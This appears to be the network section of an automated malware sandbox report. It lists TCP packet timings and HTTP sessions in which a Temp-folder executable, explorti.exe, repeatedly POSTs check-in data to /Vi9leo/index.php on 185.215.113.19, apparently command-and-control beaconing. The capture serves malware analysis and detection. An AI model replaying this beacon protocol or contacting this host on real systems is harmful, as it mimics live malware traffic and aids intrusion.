                      Jul 26, 2024 20:57:15.404668093 CEST8049747185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:15.646560907 CEST8049747185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:15.646644115 CEST4974780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:15.760164022 CEST4974780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:15.760520935 CEST4974880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:15.765324116 CEST8049748185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:15.765531063 CEST4974880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:15.765655041 CEST8049747185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:15.765714884 CEST4974780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:15.765801907 CEST4974880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:15.770730019 CEST8049748185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:16.517934084 CEST8049748185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:16.518033028 CEST4974880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:16.519432068 CEST4974880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:16.525207996 CEST8049748185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:16.768125057 CEST8049748185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:16.768219948 CEST4974880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:16.869645119 CEST4974880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:16.870079994 CEST4974980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:16.875897884 CEST8049749185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:16.875972033 CEST4974980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:16.876135111 CEST4974980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:16.876351118 CEST8049748185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:16.876394987 CEST4974880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:16.883963108 CEST8049749185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:17.647362947 CEST8049749185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:17.647470951 CEST4974980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:17.648288965 CEST4974980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:17.653058052 CEST8049749185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:17.897310972 CEST8049749185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:17.897392988 CEST4974980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:18.011795998 CEST4974980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:18.012161970 CEST4975080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:18.031586885 CEST8049750185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:18.031667948 CEST4975080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:18.031981945 CEST4975080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:18.034437895 CEST8049749185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:18.034491062 CEST4974980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:18.039598942 CEST8049750185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:18.803183079 CEST8049750185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:18.803354979 CEST4975080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:18.805221081 CEST4975080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:18.810322046 CEST8049750185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:19.052527905 CEST8049750185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:19.052756071 CEST4975080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:19.167273045 CEST4975080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:19.168044090 CEST4975180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:19.173052073 CEST8049751185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:19.173149109 CEST4975180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:19.173304081 CEST4975180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:19.173891068 CEST8049750185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:19.173957109 CEST4975080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:19.178174973 CEST8049751185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:19.964478016 CEST8049751185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:19.964590073 CEST4975180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:19.966052055 CEST4975180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:19.970988035 CEST8049751185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:21.093306065 CEST8049751185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:21.093369961 CEST4975180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:21.100799084 CEST8049751185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:21.100848913 CEST4975180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:21.102647066 CEST8049751185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:21.102709055 CEST4975180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:21.106126070 CEST8049751185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:21.106182098 CEST4975180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:21.200033903 CEST4975180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:21.200313091 CEST4975280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:21.206351995 CEST8049752185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:21.206432104 CEST4975280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:21.206554890 CEST8049751185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:21.206605911 CEST4975180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:21.206692934 CEST4975280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:21.211611986 CEST8049752185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:21.995510101 CEST8049752185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:21.995614052 CEST4975280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:21.996994972 CEST4975280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:22.015539885 CEST8049752185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:22.272706985 CEST8049752185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:22.272778034 CEST4975280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:22.385339975 CEST4975280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:22.385652065 CEST4975380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:22.395072937 CEST8049753185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:22.395164967 CEST4975380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:22.395454884 CEST4975380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:22.397839069 CEST8049752185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:22.397896051 CEST4975280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:22.400309086 CEST8049753185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:23.145682096 CEST8049753185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:23.145809889 CEST4975380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:23.146363020 CEST4975380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:23.151206017 CEST8049753185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:23.392704010 CEST8049753185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:23.392884970 CEST4975380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:23.495553970 CEST4975380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:23.496411085 CEST4975480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:23.502160072 CEST8049754185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:23.502361059 CEST4975480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:23.502688885 CEST4975480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:23.506748915 CEST8049753185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:23.506823063 CEST4975380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:23.507754087 CEST8049754185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:24.261826038 CEST8049754185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:24.261931896 CEST4975480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:24.262581110 CEST4975480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:24.267432928 CEST8049754185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:24.510602951 CEST8049754185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:24.510694027 CEST4975480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:24.620390892 CEST4975480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:24.620661020 CEST4975580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:24.625734091 CEST8049755185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:24.625808001 CEST4975580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:24.625963926 CEST4975580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:24.626315117 CEST8049754185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:24.626380920 CEST4975480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:24.630774975 CEST8049755185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:25.383291960 CEST8049755185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:25.383488894 CEST4975580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:25.384377956 CEST4975580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:25.389841080 CEST8049755185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:25.643799067 CEST8049755185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:25.643894911 CEST4975580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:25.760266066 CEST4975580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:25.760813951 CEST4975680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:25.773699045 CEST8049756185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:25.773837090 CEST4975680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:25.773972034 CEST4975680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:25.804652929 CEST8049755185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:25.804697037 CEST8049756185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:25.804719925 CEST4975580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:26.563147068 CEST8049756185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:26.563313961 CEST4975680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:26.564135075 CEST4975680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:26.569087982 CEST8049756185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:26.812366962 CEST8049756185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:26.812513113 CEST4975680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:26.919429064 CEST4975680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:26.919692039 CEST4975780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:27.133719921 CEST8049757185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:27.133825064 CEST4975780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:27.133981943 CEST4975780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:27.138531923 CEST8049756185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:27.138622046 CEST4975680192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:27.138859987 CEST8049757185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:27.894509077 CEST8049757185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:27.894694090 CEST4975780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:27.895405054 CEST4975780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:27.900468111 CEST8049757185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:28.145915985 CEST8049757185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:28.145978928 CEST4975780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:28.260225058 CEST4975780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:28.260582924 CEST4975880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:28.268532991 CEST8049758185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:28.268611908 CEST4975880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:28.269089937 CEST4975880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:28.270252943 CEST8049757185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:28.270315886 CEST4975780192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:28.276340961 CEST8049758185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:29.010404110 CEST8049758185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:29.010490894 CEST4975880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:29.011056900 CEST4975880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:29.016021013 CEST8049758185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:29.257996082 CEST8049758185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:29.258074045 CEST4975880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:29.369436979 CEST4975880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:29.369823933 CEST4975980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:29.375312090 CEST8049759185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:29.375399113 CEST8049758185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:29.375451088 CEST4975880192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:29.375529051 CEST4975980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:29.375608921 CEST4975980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:29.380474091 CEST8049759185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:30.133560896 CEST8049759185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:30.133810043 CEST4975980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:30.136085033 CEST4975980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:30.154762983 CEST8049759185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:30.398397923 CEST8049759185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:30.398488998 CEST4975980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:30.510664940 CEST4975980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:30.510977983 CEST4976080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:30.517210007 CEST8049760185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:30.517441034 CEST4976080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:30.517441034 CEST4976080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:30.517715931 CEST8049759185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:30.517815113 CEST4975980192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:30.523832083 CEST8049760185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:31.298367023 CEST8049760185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:31.298557043 CEST4976080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:31.299105883 CEST4976080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:31.306350946 CEST8049760185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:31.552133083 CEST8049760185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:31.552335978 CEST4976080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:31.666522026 CEST4976080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:31.666687012 CEST4976180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:31.671904087 CEST8049761185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:31.672013044 CEST4976180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:31.672142982 CEST4976180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:31.672573090 CEST8049760185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:31.672796011 CEST4976080192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:31.677653074 CEST8049761185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:32.427648067 CEST8049761185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:32.427757025 CEST4976180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:32.428349972 CEST4976180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:32.433429003 CEST8049761185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:32.685292006 CEST8049761185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:32.685363054 CEST4976180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:32.791336060 CEST4976180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:32.791634083 CEST4976280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:32.796601057 CEST8049762185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:32.796701908 CEST4976280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:32.796787024 CEST4976280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:32.797139883 CEST8049761185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:32.797187090 CEST4976180192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:32.801740885 CEST8049762185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:33.541835070 CEST8049762185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:33.542015076 CEST4976280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:33.542690992 CEST4976280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:33.549820900 CEST8049762185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:33.794807911 CEST8049762185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:33.794910908 CEST4976280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:33.901158094 CEST4976280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:33.902079105 CEST4976380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:33.907335997 CEST8049763185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:33.907423019 CEST4976380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:33.907682896 CEST4976380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:33.908696890 CEST8049762185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:33.908746958 CEST4976280192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:33.913569927 CEST8049763185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:34.685813904 CEST8049763185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:34.685935974 CEST4976380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:34.686503887 CEST4976380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:34.694310904 CEST8049763185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:34.942203999 CEST8049763185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:34.942308903 CEST4976380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:35.056979895 CEST4976380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:35.057250023 CEST4976480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:35.063631058 CEST8049763185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:35.063680887 CEST8049764185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:35.063704014 CEST4976380192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:35.063766956 CEST4976480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:35.063901901 CEST4976480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:35.069024086 CEST8049764185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:35.814773083 CEST8049764185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:35.814871073 CEST4976480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:35.815455914 CEST4976480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:35.821671009 CEST8049764185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:36.064908981 CEST8049764185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:36.065140009 CEST4976480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:36.170648098 CEST4976480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:36.171114922 CEST4976580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:36.182260990 CEST8049765185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:36.182352066 CEST4976580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:36.184197903 CEST4976580192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:36.188854933 CEST8049764185.215.113.19192.168.2.4
                      Jul 26, 2024 20:57:36.188932896 CEST4976480192.168.2.4185.215.113.19
                      Jul 26, 2024 20:57:36.195599079 CEST8049765185.215.113.19192.168.2.4
                      • 185.215.113.19
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.4 | 49737 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:02.821043968 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:03.606364965 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:03.608504057 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:03.861641884 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      1 | 192.168.2.4 | 49738 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:03.985050917 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:04.743524075 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:04.744437933 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:04.996643066 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      2 | 192.168.2.4 | 49739 | 185.215.113.19 | 80 | 6200 | C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 20:57:05.117528915 CEST | 154 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 20:57:05.905831099 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:05 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 20:57:05.907996893 CEST | 306 | OUT | POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.19
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jul 26, 2024 20:57:06.160979986 CEST  196  IN  HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 18:57:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                      3  192.168.2.4  49740  185.215.113.19  80  6200  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                      Timestamp  Bytes transferred  Direction  Data
                      Jul 26, 2024 20:57:06.281061888 CEST  154  OUT  POST /Vi9leo/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
